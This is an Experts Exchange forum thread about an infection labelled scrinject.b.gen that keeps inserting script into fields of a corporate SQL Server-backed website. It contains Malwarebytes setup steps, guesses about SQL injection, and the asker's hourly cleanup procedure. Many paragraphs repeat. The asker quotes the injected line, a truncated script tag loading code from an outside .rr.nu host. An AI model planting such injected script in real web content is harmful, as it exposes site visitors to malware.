Malware/Spyware Removal
How do I get rid of scrinject.b.gen?
ASKER
I have view the particular log. Did not follow thru because I need to clean ("delete?") some system files. I did start the chat.... but the support personnel requested direct access to my web server. A bit worry on that.... especially it is our 1 and only Corporate Web and Application server. Cannot afford to "damage"it.
It actually added "hyperlink script" in a text field in my MS SQL Server database.
It was detected by ESET NOD 32. For some unknown reasons, only ESET is "more" aware of this malware.
It actually added "hyperlink script" in a text field in my MS SQL Server database.
It was detected by ESET NOD 32. For some unknown reasons, only ESET is "more" aware of this malware.
malwarebytes in safemode
Have u tried Combofix
http://www.bleepingcomputer.com/combofix/how-to-use-combofix
http://www.bleepingcomputer.com/combofix/how-to-use-combofix
@masteripper - I think this is a question about a server based situation. If true, no one should be using ComboFix on it (workstation OS only).
@chongbenkee - Please give us some more details about the platform OS and what steps you have taken. Until we know more about your situation, we can only make guesses about what steps you should take.
@chongbenkee - Please give us some more details about the platform OS and what steps you have taken. Until we know more about your situation, we can only make guesses about what steps you should take.
ASKER
I have asked around and search for solution in the net. Couldn't find a specific "removal tool" yet. Personally, the "acceptable" options are by teesupport and cleanpc, but.... teesupport need to access my Web server whilst cleanpc system do not support Win2000.
I have installed Malwarebytes in both my Web and Database servers. The malware was not detected in both Win 2K servers.
Additional clarification :
- Only detected by ESET. No issue for non-ESET users.
- Once detected, user access to our in-house system (develop in VB+Asp+C++) terminated.
- The only "infection" detected thus far is that a commom script ".......<script...........
- Install Malwarebytes in both Web and Database servers because we are not sure which server is infected.
It is still manageable becos we only have a few ESET users, and the "detected" infection thus far is only the insertion of the script into a few "non-critical" fields.
Hope someone out there can help to sort this out sooner than later. Thanks in advance.
I have installed Malwarebytes in both my Web and Database servers. The malware was not detected in both Win 2K servers.
Additional clarification :
- Only detected by ESET. No issue for non-ESET users.
- Once detected, user access to our in-house system (develop in VB+Asp+C++) terminated.
- The only "infection" detected thus far is that a commom script ".......<script...........
- Install Malwarebytes in both Web and Database servers because we are not sure which server is infected.
It is still manageable becos we only have a few ESET users, and the "detected" infection thus far is only the insertion of the script into a few "non-critical" fields.
Hope someone out there can help to sort this out sooner than later. Thanks in advance.
this sql insertion could mean there is an infected machine somewhere on your network - or sql ports are open to the outside world
Download Malwarebytes Anti-Malware and save it to your desktop.
MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install.
When the installation begins, follow the prompts and do not change the default settings.
When installation has finished leave both of these checked:
Update Malwarebytes' Anti-Malware
Launch Malwarebytes' Anti-Malware
Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
If an update is found to install. Press the OK button to close that box and continue.
If you encounter any problems while downloading the definition updates, manually download the updates and just double-click on mbam-rules.exe to install.
On the Scanner tab:
Make sure the "Perform Full Scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
Click OK to close the message box and continue with the removal process.
Back at the main Scanner screen:
Click on the Show Results button to see a list of any malware that was found.
Make sure that everything is checked, and click Remove Selected.
When removal is completed, a log report will open in Notepad.
The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
Exit MBAM when done.
Post your log file when done.
Thanks to Bleeping computer.com for the detailed instructions on how to install Malwarebytes
MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.
Make sure you are connected to the Internet.
Double-click on mbam-setup.exe to install.
When the installation begins, follow the prompts and do not change the default settings.
When installation has finished leave both of these checked:
Update Malwarebytes' Anti-Malware
Launch Malwarebytes' Anti-Malware
Then click Finish.
MBAM will automatically start and you will be asked to update the program before performing a scan.
If an update is found to install. Press the OK button to close that box and continue.
If you encounter any problems while downloading the definition updates, manually download the updates and just double-click on mbam-rules.exe to install.
On the Scanner tab:
Make sure the "Perform Full Scan" option is selected.
Then click on the Scan button.
If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
The scan will begin and "Scan in progress" will show at the top. It may take some time to complete so please be patient.
When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found".
Click OK to close the message box and continue with the removal process.
Back at the main Scanner screen:
Click on the Show Results button to see a list of any malware that was found.
Make sure that everything is checked, and click Remove Selected.
When removal is completed, a log report will open in Notepad.
The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
Copy and paste the contents of that report in your next reply. Be sure to post the complete log to include the top portion which shows MBAM's database version and your operating system.
Exit MBAM when done.
Post your log file when done.
Thanks to Bleeping computer.com for the detailed instructions on how to install Malwarebytes
>>>> it is our 1 and only Corporate Web and Application server
Is the Server/Web Site published to be accessed from outside????
If it is then it might be a possibility that the hackers have gained access through the website and might have exploited the server through SQL Injection, then uploaded the shell, then uploaded files and lastly executed the files (malware/virus ...etc) to insert the text.
Further could you post the logs or screenshot of logs from the ESET as well?
Is the Server/Web Site published to be accessed from outside????
If it is then it might be a possibility that the hackers have gained access through the website and might have exploited the server through SQL Injection, then uploaded the shell, then uploaded files and lastly executed the files (malware/virus ...etc) to insert the text.
Further could you post the logs or screenshot of logs from the ESET as well?
ASKER
The problem is temporary managed using the SQL command, eg. the "addtional" script appended to the data is automatically detected and deleted. No harm done thus far.
Meanwhile, still dreaming of a "fast and easy" solution to kill scrinject.b.gen!!
Also, Mozilla, Chrome, Safari, etc will prompt a similar warning message (attachment), but not I.E. Still trying to "remove" our url from Google "Safe Browsing" security list.
Meanwhile, still dreaming of a "fast and easy" solution to kill scrinject.b.gen!!
Also, Mozilla, Chrome, Safari, etc will prompt a similar warning message (attachment), but not I.E. Still trying to "remove" our url from Google "Safe Browsing" security list.
Also, Mozilla, Chrome, Safari, etc will prompt a similar warning message (attachment), but not I.E. Still trying to "remove" our url from Google "Safe Browsing" security list.
Is there any website which is publicly available which we can analyze?
Sudeep
ASKER
The script detected by Google Webmaster :
<script src="http://eighbo02rsbarr.rr.nu" target="_blank" onmouseover="javascript:th
However, the "script" is currently automatically detected and deleted via our sql command (stored procedure), set to run hourly. In other words, Google Webmaster will not find the script anymore unless the crawling was done during the hourly gap.
The "attack" seems to "slow down"......... the previous attack was on 1 Sept 2012.
<script src="http://eighbo02rsbarr.rr.nu" target="_blank" onmouseover="javascript:th
However, the "script" is currently automatically detected and deleted via our sql command (stored procedure), set to run hourly. In other words, Google Webmaster will not find the script anymore unless the crawling was done during the hourly gap.
The "attack" seems to "slow down"......... the previous attack was on 1 Sept 2012.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
No cure form now. Been too long. Will re-look into this only if necessary.
http://blog.teesupport.com/guides-to-remove-htmlscrinject-b-gen-infection-efficiently-and-completely/
Out of curiosity, how did you know you had it and what A-V are you using?